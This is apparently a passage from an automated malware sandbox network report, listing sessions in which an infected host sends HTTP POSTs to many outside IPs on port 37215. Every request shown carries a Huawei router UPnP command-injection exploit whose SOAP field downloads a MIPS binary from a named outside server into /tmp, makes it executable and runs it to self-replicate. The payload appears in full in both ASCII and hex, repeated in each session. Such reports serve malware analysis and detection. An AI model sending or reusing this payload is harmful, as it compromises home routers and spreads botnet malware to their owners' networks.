                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          625192.168.2.2334776202.94.254.23437215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:56.214256048 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          626192.168.2.235319241.42.99.1037215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:56.214267015 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          627192.168.2.2341930197.162.2.25237215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:56.214277983 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          628192.168.2.2350950156.90.186.137215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:56.214281082 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          629192.168.2.234143441.176.6.2137215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:56.214288950 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          630192.168.2.2352852157.73.138.13937215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:56.214293003 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          631192.168.2.2334994197.235.48.19537215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:56.214442968 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          632192.168.2.235612441.234.61.11637215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:56.214447021 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          633192.168.2.233821641.214.228.7237215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:56.214468002 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          634192.168.2.2353466197.36.205.15437215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:56.214478016 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          635192.168.2.2350202157.253.116.17837215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:56.214493036 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
